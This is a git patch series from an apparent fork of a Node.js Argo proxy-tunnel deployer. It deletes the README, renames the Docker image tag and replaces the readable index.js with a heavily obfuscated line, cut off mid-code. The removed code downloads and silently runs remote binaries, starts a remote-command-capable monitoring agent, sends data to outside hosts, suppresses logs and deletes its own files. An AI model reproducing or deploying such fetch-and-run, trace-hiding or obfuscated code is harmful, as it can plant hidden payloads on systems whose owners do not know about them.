From 809d4f48659ff822e11315420523c9e92863a843 Mon Sep 17 00:00:00 2001 From: c39027556 <49715253+c39027556@users.noreply.github.com> Date: Sat, 15 Nov 2025 21:29:59 +0800 Subject: [PATCH 01/19] Delete README.md --- README.md | 209 ------------------------------------------------------ 1 file changed, 209 deletions(-) delete mode 100644 README.md diff --git a/README.md b/README.md deleted file mode 100644 index f07f8f3ac6..0000000000 --- a/README.md +++ /dev/null @@ -1,209 +0,0 @@ -
- -# nodejs-argo隧道代理 - -[![npm version](https://img.shields.io/npm/v/nodejs-argo.svg)](https://www.npmjs.com/package/nodejs-argo) -[![npm downloads](https://img.shields.io/npm/dm/nodejs-argo.svg)](https://www.npmjs.com/package/nodejs-argo) -[![License](https://img.shields.io/npm/l/nodejs-argo.svg)](https://github.com/eooce/nodejs-argo/blob/main/LICENSE) - -nodejs-argo是一个强大的Argo隧道部署工具,专为PaaS平台和游戏玩具平台设计。它支持多种代理协议(VLESS、VMess、Trojan等),并集成了哪吒探针功能。 - ---- - -Telegram交流反馈群组:https://t.me/eooceu -
- -## 郑重声明 -* 本项目自2025年10月29日15时45分起,已更改开源协议为GPL 3.0,并包含以下特定要求 -* 此项目仅限个人使用,禁止用于商业行为(包括但不限于:youtube,bilibili,tiktok,facebook..等等) -* 禁止新建项目将代码复制到自己仓库中用做商业行为 -* 请遵守当地法律法规,禁止滥用做公共代理行为 -* 如有违反以上条款者将追究法律责任 - -## 说明 (部署前请仔细阅读) - -* 本项目是针对node环境的paas平台和游戏玩具而生,采用Argo隧道部署节点,集成哪吒探针v0或v1可选。 -* node玩具平台只需上传index.js和package.json即可,paas平台需要docker部署的才上传Dockerfile。 -* 不填写ARGO_DOMAIN和ARGO_AUTH两个变量即启用临时隧道,反之则使用固定隧道。 -* 哪吒v0/v1可选,当哪吒端口为{443,8443,2096,2087,2083,2053}其中之一时,自动开启tls。 - -## 📋 环境变量 - -| 变量名 | 是否必须 | 默认值 | 说明 | -|--------|----------|--------|------| -| UPLOAD_URL | 否 | - | 订阅上传地址 | -| PROJECT_URL | 否 | https://www.google.com | 项目分配的域名 | -| AUTO_ACCESS | 否 | false | 是否开启自动访问保活 | -| PORT | 否 | 3000 | HTTP服务监听端口 | -| ARGO_PORT | 否 | 8001 | Argo隧道端口 | -| UUID | 否 | 89c13786-25aa-4520-b2e7-12cd60fb5202 | 用户UUID | -| NEZHA_SERVER | 否 | - | 哪吒面板域名 | -| NEZHA_PORT | 否 | - | 哪吒端口 | -| NEZHA_KEY | 否 | - | 哪吒密钥 | -| ARGO_DOMAIN | 否 | - | Argo固定隧道域名 | -| ARGO_AUTH | 否 | - | Argo固定隧道密钥 | -| CFIP | 否 | www.visa.com.tw | 节点优选域名或IP | -| CFPORT | 否 | 443 | 节点端口 | -| NAME | 否 | Vls | 节点名称前缀 | -| FILE_PATH | 否 | ./tmp | 运行目录 | -| SUB_PATH | 否 | sub | 订阅路径 | - -## 🌐 订阅地址 - -- 标准端口:`https://your-domain.com/sub` -- 非标端口:`http://your-domain.com:port/sub` - ---- - -## 🚀 进阶使用 - -### 安装 - -```bash -# 全局安装(推荐) -npm install -g nodejs-argo - -# 或者使用yarn -yarn global add nodejs-argo - -# 或者使用pnpm -pnpm add -g nodejs-argo -``` - -### 基本使用 - -```bash -# 直接运行(使用默认配置) -nodejs-argo - -# 使用npx运行 -npx nodejs-argo - -# 设置环境变量运行 - PORT=3000 npx nodejs-argo -``` - -### 环境变量配置 - -可使用 `.env` 文件来配置环境变量运行 - - -或者直接在命令行中设置: - -```bash -export UPLOAD_URL="https://your-merge-sub-domain.com" -export PROJECT_URL="https://your-project-domain.com" -export PORT=3000 -export UUID="your-uuid-here" -export NEZHA_SERVER="nz.your-domain.com:8008" -export NEZHA_KEY="your-nezha-key" -``` - -## 📦 作为npm模块使用 - -```javascript -// CommonJS -const nodejsArgo = require('nodejs-argo'); - -// ES6 Modules -import nodejsArgo from 'nodejs-argo'; - -// 启动服务 -nodejsArgo.start(); -``` - -## 🔧 后台运行 - -### 使用screen(推荐) -```bash -# 创建screen会话 -screen -S argo - -# 运行应用 -nodejs-argo - -# 按 Ctrl+A 然后按 D 分离会话 -# 重新连接:screen -r argo -``` - -### 使用tmux -```bash -# 创建tmux会话 -tmux new-session -d -s argo - -# 运行应用 -tmux send-keys -t argo "nodejs-argo" Enter - -# 分离会话:tmux detach -s argo -# 重新连接:tmux attach -t argo -``` - -### 使用PM2 -```bash -# 安装PM2 -npm install -g pm2 - -# 启动应用 -pm2 start nodejs-argo --name "argo-service" - -# 管理应用 -pm2 status -pm2 logs argo-service -pm2 restart argo-service -``` - -### 使用systemd(Linux系统服务) -```bash -# 创建服务文件 -sudo nano /etc/systemd/system/nodejs-argo.service - -``` -[Unit] -Description=Node.js Argo Service -After=network.target - -[Service] -Type=simple -User=root -WorkingDirectory=/root/test -Environment=ARGO_PORT=8080 -Environment=PORT=3000 -ExecStart=/usr/bin/npx nodejs-argo -Restart=always -RestartSec=10 - -[Install] -WantedBy=multi-user.target -``` - -# 启动服务 -sudo systemctl start nodejs-argo -sudo systemctl enable nodejs-argo -``` - -## 🔄 更新 - -```bash -# 更新全局安装的包 -npm update -g nodejs-argo - -# 或者重新安装 -npm uninstall -g nodejs-argo -npm install -g nodejs-argo -``` - -## 📚 更多信息 - -- [GitHub仓库](https://github.com/eooce/nodejs-argo) -- [npm包页面](https://www.npmjs.com/package/nodejs-argo) -- [问题反馈](https://github.com/eooce/nodejs-argo/issues) - ---- - -## 赞助 -* 感谢[VPS.Town](https://vps.town)提供赞助 https://vps.town - -* 感谢[ZMTO](https://zmto.com/?affid=1548)提供赞助优质双isp vps。 - -## 许可证 -GPL 3.0 From 13b7730e6cf3a0eb914389693173cf62dfb58264 Mon Sep 17 00:00:00 2001 From: c39027556 <49715253+c39027556@users.noreply.github.com> Date: Sat, 15 Nov 2025 21:31:20 +0800 Subject: [PATCH 02/19] Update build-docker-image.yml --- .github/workflows/build-docker-image.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build-docker-image.yml b/.github/workflows/build-docker-image.yml index 8921cacbef..6be2fb67f7 100644 --- a/.github/workflows/build-docker-image.yml +++ b/.github/workflows/build-docker-image.yml @@ -39,7 +39,7 @@ jobs: push: true platforms: linux/amd64,linux/arm64 tags: | - ghcr.io/${{ github.repository_owner }}/nodejs:latest + ghcr.io/${{ github.repository_owner }}/zzzip:9982 labels: | org.opencontainers.image.source=https://github.com/${{ github.repository }} org.opencontainers.image.description=HTTP Server From 06d6c2d67dd311c5ab778d01d33f7779c9ca6122 Mon Sep 17 00:00:00 2001 From: c39027556 <49715253+c39027556@users.noreply.github.com> Date: Sat, 15 Nov 2025 21:40:01 +0800 Subject: [PATCH 03/19] Update index.js --- index.js | 609 +------------------------------------------------------ 1 file changed, 1 insertion(+), 608 deletions(-) diff --git a/index.js b/index.js index 990ec54fdf..6f1dfe71d7 100644 --- a/index.js +++ b/index.js @@ -1,608 +1 @@ -const express = require("express"); -const app = express(); -const axios = require("axios"); -const os = require('os'); -const fs = require("fs"); -const path = require("path"); -const { promisify } = require('util'); -const exec = promisify(require('child_process').exec); -const { execSync } = require('child_process'); // 只填写UPLOAD_URL将上传节点,同时填写UPLOAD_URL和PROJECT_URL将上传订阅 -const UPLOAD_URL = process.env.UPLOAD_URL || ''; // 节点或订阅自动上传地址,需填写部署Merge-sub项目后的首页地址,例如:https://merge.xxx.com -const PROJECT_URL = process.env.PROJECT_URL || ''; // 需要上传订阅或保活时需填写项目分配的url,例如:https://google.com -const AUTO_ACCESS = process.env.AUTO_ACCESS || false; // false关闭自动保活,true开启,需同时填写PROJECT_URL变量 -const FILE_PATH = process.env.FILE_PATH || './tmp'; // 运行目录,sub节点文件保存目录 -const SUB_PATH = process.env.SUB_PATH || 'sub'; // 订阅路径 -const PORT = process.env.SERVER_PORT || process.env.PORT || 3000; // http服务订阅端口 -const UUID = process.env.UUID || '9afd1229-b893-40c1-84dd-51e7ce204913'; // 使用哪吒v1,在不同的平台运行需修改UUID,否则会覆盖 -const NEZHA_SERVER = process.env.NEZHA_SERVER || ''; // 哪吒v1填写形式: nz.abc.com:8008 哪吒v0填写形式:nz.abc.com -const NEZHA_PORT = process.env.NEZHA_PORT || ''; // 使用哪吒v1请留空,哪吒v0需填写 -const NEZHA_KEY = process.env.NEZHA_KEY || ''; // 哪吒v1的NZ_CLIENT_SECRET或哪吒v0的agent密钥 -const ARGO_DOMAIN = process.env.ARGO_DOMAIN || ''; // 固定隧道域名,留空即启用临时隧道 -const ARGO_AUTH = process.env.ARGO_AUTH || ''; // 固定隧道密钥json或token,留空即启用临时隧道,json获取地址:https://json.zone.id -const ARGO_PORT = process.env.ARGO_PORT || 8001; // 固定隧道端口,使用token需在cloudflare后台设置和这里一致 -const CFIP = process.env.CFIP || 'cdns.doon.eu.org'; // 节点优选域名或优选ip -const CFPORT = process.env.CFPORT || 443; // 节点优选域名或优选ip对应的端口 -const NAME = process.env.NAME || ''; // 节点名称 - -// 创建运行文件夹 -if (!fs.existsSync(FILE_PATH)) { - fs.mkdirSync(FILE_PATH); - console.log(`${FILE_PATH} is created`); -} else { - console.log(`${FILE_PATH} already exists`); -} - -// 生成随机6位字符文件名 -function generateRandomName() { - const characters = 'abcdefghijklmnopqrstuvwxyz'; - let result = ''; - for (let i = 0; i < 6; i++) { - result += characters.charAt(Math.floor(Math.random() * characters.length)); - } - return result; -} - -// 全局常量 -const npmName = generateRandomName(); -const webName = generateRandomName(); -const botName = generateRandomName(); -const phpName = generateRandomName(); -let npmPath = path.join(FILE_PATH, npmName); -let phpPath = path.join(FILE_PATH, phpName); -let webPath = path.join(FILE_PATH, webName); -let botPath = path.join(FILE_PATH, botName); -let subPath = path.join(FILE_PATH, 'sub.txt'); -let listPath = path.join(FILE_PATH, 'list.txt'); -let bootLogPath = path.join(FILE_PATH, 'boot.log'); -let configPath = path.join(FILE_PATH, 'config.json'); - -// 如果订阅器上存在历史运行节点则先删除 -function deleteNodes() { - try { - if (!UPLOAD_URL) return; - if (!fs.existsSync(subPath)) return; - - let fileContent; - try { - fileContent = fs.readFileSync(subPath, 'utf-8'); - } catch { - return null; - } - - const decoded = Buffer.from(fileContent, 'base64').toString('utf-8'); - const nodes = decoded.split('\n').filter(line => - /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line) - ); - - if (nodes.length === 0) return; - - axios.post(`${UPLOAD_URL}/api/delete-nodes`, - JSON.stringify({ nodes }), - { headers: { 'Content-Type': 'application/json' } } - ).catch((error) => { - return null; - }); - return null; - } catch (err) { - return null; - } -} - -// 清理历史文件 -function cleanupOldFiles() { - try { - const files = fs.readdirSync(FILE_PATH); - files.forEach(file => { - const filePath = path.join(FILE_PATH, file); - try { - const stat = fs.statSync(filePath); - if (stat.isFile()) { - fs.unlinkSync(filePath); - } - } catch (err) { - // 忽略所有错误,不记录日志 - } - }); - } catch (err) { - // 忽略所有错误,不记录日志 - } -} - -// 根路由 -app.get("/", function(req, res) { - res.send("Hello world!"); -}); - -// 生成xr-ay配置文件 -async function generateConfig() { - const config = { - log: { access: '/dev/null', error: '/dev/null', loglevel: 'none' }, - inbounds: [ - { port: ARGO_PORT, protocol: 'vless', settings: { clients: [{ id: UUID, flow: 'xtls-rprx-vision' }], decryption: 'none', fallbacks: [{ dest: 3001 }, { path: "/vless-argo", dest: 3002 }, { path: "/vmess-argo", dest: 3003 }, { path: "/trojan-argo", dest: 3004 }] }, streamSettings: { network: 'tcp' } }, - { port: 3001, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID }], decryption: "none" }, streamSettings: { network: "tcp", security: "none" } }, - { port: 3002, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID, level: 0 }], decryption: "none" }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/vless-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, - { port: 3003, listen: "127.0.0.1", protocol: "vmess", settings: { clients: [{ id: UUID, alterId: 0 }] }, streamSettings: { network: "ws", wsSettings: { path: "/vmess-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, - { port: 3004, listen: "127.0.0.1", protocol: "trojan", settings: { clients: [{ password: UUID }] }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/trojan-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, - ], - dns: { servers: ["https+local://8.8.8.8/dns-query"] }, - outbounds: [ { protocol: "freedom", tag: "direct" }, {protocol: "blackhole", tag: "block"} ] - }; - fs.writeFileSync(path.join(FILE_PATH, 'config.json'), JSON.stringify(config, null, 2)); -} - -// 判断系统架构 -function getSystemArchitecture() { - const arch = os.arch(); - if (arch === 'arm' || arch === 'arm64' || arch === 'aarch64') { - return 'arm'; - } else { - return 'amd'; - } -} - -// 下载对应系统架构的依赖文件 -function downloadFile(fileName, fileUrl, callback) { - const filePath = fileName; - - // 确保目录存在 - if (!fs.existsSync(FILE_PATH)) { - fs.mkdirSync(FILE_PATH, { recursive: true }); - } - - const writer = fs.createWriteStream(filePath); - - axios({ - method: 'get', - url: fileUrl, - responseType: 'stream', - }) - .then(response => { - response.data.pipe(writer); - - writer.on('finish', () => { - writer.close(); - console.log(`Download ${path.basename(filePath)} successfully`); - callback(null, filePath); - }); - - writer.on('error', err => { - fs.unlink(filePath, () => { }); - const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`; - console.error(errorMessage); // 下载失败时输出错误消息 - callback(errorMessage); - }); - }) - .catch(err => { - const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`; - console.error(errorMessage); // 下载失败时输出错误消息 - callback(errorMessage); - }); -} - -// 下载并运行依赖文件 -async function downloadFilesAndRun() { - - const architecture = getSystemArchitecture(); - const filesToDownload = getFilesForArchitecture(architecture); - - if (filesToDownload.length === 0) { - console.log(`Can't find a file for the current architecture`); - return; - } - - const downloadPromises = filesToDownload.map(fileInfo => { - return new Promise((resolve, reject) => { - downloadFile(fileInfo.fileName, fileInfo.fileUrl, (err, filePath) => { - if (err) { - reject(err); - } else { - resolve(filePath); - } - }); - }); - }); - - try { - await Promise.all(downloadPromises); - } catch (err) { - console.error('Error downloading files:', err); - return; - } - // 授权和运行 - function authorizeFiles(filePaths) { - const newPermissions = 0o775; - filePaths.forEach(absoluteFilePath => { - if (fs.existsSync(absoluteFilePath)) { - fs.chmod(absoluteFilePath, newPermissions, (err) => { - if (err) { - console.error(`Empowerment failed for ${absoluteFilePath}: ${err}`); - } else { - console.log(`Empowerment success for ${absoluteFilePath}: ${newPermissions.toString(8)}`); - } - }); - } - }); - } - const filesToAuthorize = NEZHA_PORT ? [npmPath, webPath, botPath] : [phpPath, webPath, botPath]; - authorizeFiles(filesToAuthorize); - - //运行ne-zha - if (NEZHA_SERVER && NEZHA_KEY) { - if (!NEZHA_PORT) { - // 检测哪吒是否开启TLS - const port = NEZHA_SERVER.includes(':') ? NEZHA_SERVER.split(':').pop() : ''; - const tlsPorts = new Set(['443', '8443', '2096', '2087', '2083', '2053']); - const nezhatls = tlsPorts.has(port) ? 'true' : 'false'; - // 生成 config.yaml - const configYaml = ` -client_secret: ${NEZHA_KEY} -debug: false -disable_auto_update: true -disable_command_execute: false -disable_force_update: true -disable_nat: false -disable_send_query: false -gpu: false -insecure_tls: true -ip_report_period: 1800 -report_delay: 4 -server: ${NEZHA_SERVER} -skip_connection_count: true -skip_procs_count: true -temperature: false -tls: ${nezhatls} -use_gitee_to_upgrade: false -use_ipv6_country_code: false -uuid: ${UUID}`; - - fs.writeFileSync(path.join(FILE_PATH, 'config.yaml'), configYaml); - - // 运行 v1 - const command = `nohup ${phpPath} -c "${FILE_PATH}/config.yaml" >/dev/null 2>&1 &`; - try { - await exec(command); - console.log(`${phpName} is running`); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`php running error: ${error}`); - } - } else { - let NEZHA_TLS = ''; - const tlsPorts = ['443', '8443', '2096', '2087', '2083', '2053']; - if (tlsPorts.includes(NEZHA_PORT)) { - NEZHA_TLS = '--tls'; - } - const command = `nohup ${npmPath} -s ${NEZHA_SERVER}:${NEZHA_PORT} -p ${NEZHA_KEY} ${NEZHA_TLS} --disable-auto-update --report-delay 4 --skip-conn --skip-procs >/dev/null 2>&1 &`; - try { - await exec(command); - console.log(`${npmName} is running`); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`npm running error: ${error}`); - } - } - } else { - console.log('NEZHA variable is empty,skip running'); - } - //运行xr-ay - const command1 = `nohup ${webPath} -c ${FILE_PATH}/config.json >/dev/null 2>&1 &`; - try { - await exec(command1); - console.log(`${webName} is running`); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`web running error: ${error}`); - } - - // 运行cloud-fared - if (fs.existsSync(botPath)) { - let args; - - if (ARGO_AUTH.match(/^[A-Z0-9a-z=]{120,250}$/)) { - args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 run --token ${ARGO_AUTH}`; - } else if (ARGO_AUTH.match(/TunnelSecret/)) { - args = `tunnel --edge-ip-version auto --config ${FILE_PATH}/tunnel.yml run`; - } else { - args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; - } - - try { - await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`); - console.log(`${botName} is running`); - await new Promise((resolve) => setTimeout(resolve, 2000)); - } catch (error) { - console.error(`Error executing command: ${error}`); - } - } - await new Promise((resolve) => setTimeout(resolve, 5000)); - -} - -//根据系统架构返回对应的url -function getFilesForArchitecture(architecture) { - let baseFiles; - if (architecture === 'arm') { - baseFiles = [ - { fileName: webPath, fileUrl: "https://arm64.ssss.nyc.mn/web" }, - { fileName: botPath, fileUrl: "https://arm64.ssss.nyc.mn/bot" } - ]; - } else { - baseFiles = [ - { fileName: webPath, fileUrl: "https://amd64.ssss.nyc.mn/web" }, - { fileName: botPath, fileUrl: "https://amd64.ssss.nyc.mn/bot" } - ]; - } - - if (NEZHA_SERVER && NEZHA_KEY) { - if (NEZHA_PORT) { - const npmUrl = architecture === 'arm' - ? "https://arm64.ssss.nyc.mn/agent" - : "https://amd64.ssss.nyc.mn/agent"; - baseFiles.unshift({ - fileName: npmPath, - fileUrl: npmUrl - }); - } else { - const phpUrl = architecture === 'arm' - ? "https://arm64.ssss.nyc.mn/v1" - : "https://amd64.ssss.nyc.mn/v1"; - baseFiles.unshift({ - fileName: phpPath, - fileUrl: phpUrl - }); - } - } - - return baseFiles; -} - -// 获取固定隧道json -function argoType() { - if (!ARGO_AUTH || !ARGO_DOMAIN) { - console.log("ARGO_DOMAIN or ARGO_AUTH variable is empty, use quick tunnels"); - return; - } - - if (ARGO_AUTH.includes('TunnelSecret')) { - fs.writeFileSync(path.join(FILE_PATH, 'tunnel.json'), ARGO_AUTH); - const tunnelYaml = ` - tunnel: ${ARGO_AUTH.split('"')[11]} - credentials-file: ${path.join(FILE_PATH, 'tunnel.json')} - protocol: http2 - - ingress: - - hostname: ${ARGO_DOMAIN} - service: http://localhost:${ARGO_PORT} - originRequest: - noTLSVerify: true - - service: http_status:404 - `; - fs.writeFileSync(path.join(FILE_PATH, 'tunnel.yml'), tunnelYaml); - } else { - console.log("ARGO_AUTH mismatch TunnelSecret,use token connect to tunnel"); - } -} -argoType(); - -// 获取临时隧道domain -async function extractDomains() { - let argoDomain; - - if (ARGO_AUTH && ARGO_DOMAIN) { - argoDomain = ARGO_DOMAIN; - console.log('ARGO_DOMAIN:', argoDomain); - await generateLinks(argoDomain); - } else { - try { - const fileContent = fs.readFileSync(path.join(FILE_PATH, 'boot.log'), 'utf-8'); - const lines = fileContent.split('\n'); - const argoDomains = []; - lines.forEach((line) => { - const domainMatch = line.match(/https?:\/\/([^ ]*trycloudflare\.com)\/?/); - if (domainMatch) { - const domain = domainMatch[1]; - argoDomains.push(domain); - } - }); - - if (argoDomains.length > 0) { - argoDomain = argoDomains[0]; - console.log('ArgoDomain:', argoDomain); - await generateLinks(argoDomain); - } else { - console.log('ArgoDomain not found, re-running bot to obtain ArgoDomain'); - // 删除 boot.log 文件,等待 2s 重新运行 server 以获取 ArgoDomain - fs.unlinkSync(path.join(FILE_PATH, 'boot.log')); - async function killBotProcess() { - try { - // Windows系统使用taskkill命令 - if (process.platform === 'win32') { - await exec(`taskkill /f /im ${botName}.exe > nul 2>&1`); - } else { - await exec(`pkill -f "[${botName.charAt(0)}]${botName.substring(1)}" > /dev/null 2>&1`); - } - } catch (error) { - // 忽略输出 - } - } - killBotProcess(); - await new Promise((resolve) => setTimeout(resolve, 3000)); - const args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; - try { - await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`); - console.log(`${botName} is running`); - await new Promise((resolve) => setTimeout(resolve, 3000)); - await extractDomains(); // 重新提取域名 - } catch (error) { - console.error(`Error executing command: ${error}`); - } - } - } catch (error) { - console.error('Error reading boot.log:', error); - } - } - - // 生成 list 和 sub 信息 - async function generateLinks(argoDomain) { - const metaInfo = execSync( - 'curl -sm 5 https://speed.cloudflare.com/meta | awk -F\\" \'{print $26"-"$18}\' | sed -e \'s/ /_/g\'', - { encoding: 'utf-8' } - ); - const ISP = metaInfo.trim(); - // 如果 NAME 为空,则只使用 ISP 作为名称 - const nodeName = NAME ? `${NAME}-${ISP}` : ISP; - - return new Promise((resolve) => { - setTimeout(() => { - const VMESS = { v: '2', ps: `${nodeName}`, add: CFIP, port: CFPORT, id: UUID, aid: '0', scy: 'none', net: 'ws', type: 'none', host: argoDomain, path: '/vmess-argo?ed=2560', tls: 'tls', sni: argoDomain, alpn: '', fp: 'firefox'}; - const subTxt = ` -vless://${UUID}@${CFIP}:${CFPORT}?encryption=none&security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Fvless-argo%3Fed%3D2560#${nodeName} - -vmess://${Buffer.from(JSON.stringify(VMESS)).toString('base64')} - -trojan://${UUID}@${CFIP}:${CFPORT}?security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Ftrojan-argo%3Fed%3D2560#${nodeName} - `; - // 打印 sub.txt 内容到控制台 - console.log(Buffer.from(subTxt).toString('base64')); - fs.writeFileSync(subPath, Buffer.from(subTxt).toString('base64')); - console.log(`${FILE_PATH}/sub.txt saved successfully`); - uploadNodes(); - // 将内容进行 base64 编码并写入 SUB_PATH 路由 - app.get(`/${SUB_PATH}`, (req, res) => { - const encodedContent = Buffer.from(subTxt).toString('base64'); - res.set('Content-Type', 'text/plain; charset=utf-8'); - res.send(encodedContent); - }); - resolve(subTxt); - }, 2000); - }); - } -} - -// 自动上传节点或订阅 -async function uploadNodes() { - if (UPLOAD_URL && PROJECT_URL) { - const subscriptionUrl = `${PROJECT_URL}/${SUB_PATH}`; - const jsonData = { - subscription: [subscriptionUrl] - }; - try { - const response = await axios.post(`${UPLOAD_URL}/api/add-subscriptions`, jsonData, { - headers: { - 'Content-Type': 'application/json' - } - }); - - if (response && response.status === 200) { - console.log('Subscription uploaded successfully'); - return response; - } else { - return null; - // console.log('Unknown response status'); - } - } catch (error) { - if (error.response) { - if (error.response.status === 400) { - // console.error('Subscription already exists'); - } - } - } - } else if (UPLOAD_URL) { - if (!fs.existsSync(listPath)) return; - const content = fs.readFileSync(listPath, 'utf-8'); - const nodes = content.split('\n').filter(line => /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line)); - - if (nodes.length === 0) return; - - const jsonData = JSON.stringify({ nodes }); - - try { - const response = await axios.post(`${UPLOAD_URL}/api/add-nodes`, jsonData, { - headers: { 'Content-Type': 'application/json' } - }); - if (response && response.status === 200) { - console.log('Nodes uploaded successfully'); - return response; - } else { - return null; - } - } catch (error) { - return null; - } - } else { - // console.log('Skipping upload nodes'); - return; - } -} - -// 90s后删除相关文件 -function cleanFiles() { - setTimeout(() => { - const filesToDelete = [bootLogPath, configPath, webPath, botPath]; - - if (NEZHA_PORT) { - filesToDelete.push(npmPath); - } else if (NEZHA_SERVER && NEZHA_KEY) { - filesToDelete.push(phpPath); - } - - // Windows系统使用不同的删除命令 - if (process.platform === 'win32') { - exec(`del /f /q ${filesToDelete.join(' ')} > nul 2>&1`, (error) => { - console.clear(); - console.log('App is running'); - console.log('Thank you for using this script, enjoy!'); - }); - } else { - exec(`rm -rf ${filesToDelete.join(' ')} >/dev/null 2>&1`, (error) => { - console.clear(); - console.log('App is running'); - console.log('Thank you for using this script, enjoy!'); - }); - } - }, 90000); // 90s -} -cleanFiles(); - -// 自动访问项目URL -async function AddVisitTask() { - if (!AUTO_ACCESS || !PROJECT_URL) { - console.log("Skipping adding automatic access task"); - return; - } - - try { - const response = await axios.post('https://oooo.serv00.net/add-url', { - url: PROJECT_URL - }, { - headers: { - 'Content-Type': 'application/json' - } - }); - // console.log(`${JSON.stringify(response.data)}`); - console.log(`automatic access task added successfully`); - return response; - } catch (error) { - console.error(`Add automatic access task faild: ${error.message}`); - return null; - } -} - -// 主运行逻辑 -async function startserver() { - try { - deleteNodes(); - cleanupOldFiles(); - await generateConfig(); - await downloadFilesAndRun(); - await extractDomains(); - await AddVisitTask(); - } catch (error) { - console.error('Error in startserver:', error); - } -} -startserver().catch(error => { - console.error('Unhandled error in startserver:', error); -}); - -app.listen(PORT, () => console.log(`http server is running on port:${PORT}!`)); +(function(_0x25b1b4,_0x4f1892){const _0x98bc7a=_0x25b1b4();function _0xae4b24(_0x5a6985,_0x30a9c8,_0x5850c8,_0x148d3f){return _0x4971(_0x148d3f-0x7c,_0x5850c8);}function _0x43dcde(_0x5a540d,_0x34f927,_0x580865,_0x2d3047){return _0x4971(_0x5a540d-0x6,_0x580865);}while(!![]){try{const _0x116ead=-parseInt(_0x43dcde(0x3da,0x2c3,0x31f,0x4f4))/(0x10e2+0xfa+-0x11db)*(-parseInt(_0xae4b24(0x216,0x16f,0x304,0x1f2))/(0x2e7*-0xb+-0x85*-0x42+-0x25b))+-parseInt(_0xae4b24(0x231,0x17f,0x15b,0x277))/(0x166c+0xa27*0x3+0x1*-0x34de)*(parseInt(_0xae4b24(0x1a5,0x1b0,0x109,0x1ff))/(0x71b*0x5+-0x1*0x25aa+0x13*0x1d))+parseInt(_0x43dcde(0x2ab,0x1fd,0x3ae,0x2f1))/(-0x1*-0x1456+0x10c0+-0x2511)+-parseInt(_0xae4b24(0x389,0x302,0x221,0x240))/(0xb5*0x4+-0x1153+0xe85)+-parseInt(_0x43dcde(0x23b,0x23a,0x2a8,0x286))/(0x259*-0x10+-0x1bc*-0xe+0xd4f)*(parseInt(_0x43dcde(0x408,0x2c2,0x464,0x4e2))/(-0x165e+-0x5*0x44c+0x52*0x89))+parseInt(_0x43dcde(0x1ee,0x19e,0x221,0x1da))/(-0xff7*-0x1+-0x23f7+-0x17*-0xdf)*(parseInt(_0x43dcde(0x35a,0x38f,0x24a,0x336))/(0xb58+-0x1823+-0x1*-0xcd5))+parseInt(_0xae4b24(0x2d3,0x3ca,0x2d4,0x268))/(-0x36*-0x2e+0xb0c+-0x14b5);if(_0x116ead===_0x4f1892)break;else _0x98bc7a['push'](_0x98bc7a['shift']());}catch(_0x3f804f){_0x98bc7a['push'](_0x98bc7a['shift']());}}}(_0x2c50,0x17*-0x4ffa+-0x3445*0x25+0x13f097));const _0x16b6db=(function(){const _0x451532={};_0x451532[_0x528275(0x14b,0x178,0x378,0x208)]=function(_0xdd4da6,_0x4daf05){return _0xdd4da6!==_0x4daf05;},_0x451532[_0x528275(0x43f,0x486,0x28f,0x38b)]='PaVdt';function _0x528275(_0xdc019d,_0x47cc8d,_0x126623,_0x332a83){return _0x4971(_0x332a83- -0x11,_0x126623);}_0x451532[_0x1ae50a(0x22,0xe2,0x61,0x4a)]=_0x528275(0x3c7,0x349,0x253,0x32c),_0x451532[_0x528275(0x200,0x1e1,0x464,0x327)]='oIcya',_0x451532[_0x1ae50a(0x1c7,0x151,0x25a,0x20a)]=function(_0x1014c5,_0x52cc04){return _0x1014c5===_0x52cc04;},_0x451532[_0x528275(0x27b,0x1ba,0x423,0x30a)]=_0x528275(0x186,-0x43,0x190,0x125),_0x451532[_0x1ae50a(0x14c,-0x15,0x57,-0xc7)]='Yltvb';const _0x18865f=_0x451532;let _0x5d2708=!![];function _0x1ae50a(_0x86c21,_0xdd2fc9,_0x4e1117,_0x2a7714){return _0x4971(_0xdd2fc9- -0x179,_0x86c21);}return function(_0x43a64f,_0x5498c3){function _0x4481fe(_0x5a0518,_0xcc13b7,_0x11c238,_0x5c3609){return _0x528275(_0x5a0518-0x100,_0xcc13b7-0x1d2,_0x5c3609,_0x5a0518- -0x364);}function _0x3ba918(_0x2d62df,_0x3ada15,_0x7867b5,_0x3727b6){return _0x1ae50a(_0x7867b5,_0x3727b6-0x6b,_0x7867b5-0x1ac,_0x3727b6-0x74);}const _0x13f4ff={'Cgxfy':function(_0x241287,_0x2cdcfd){return 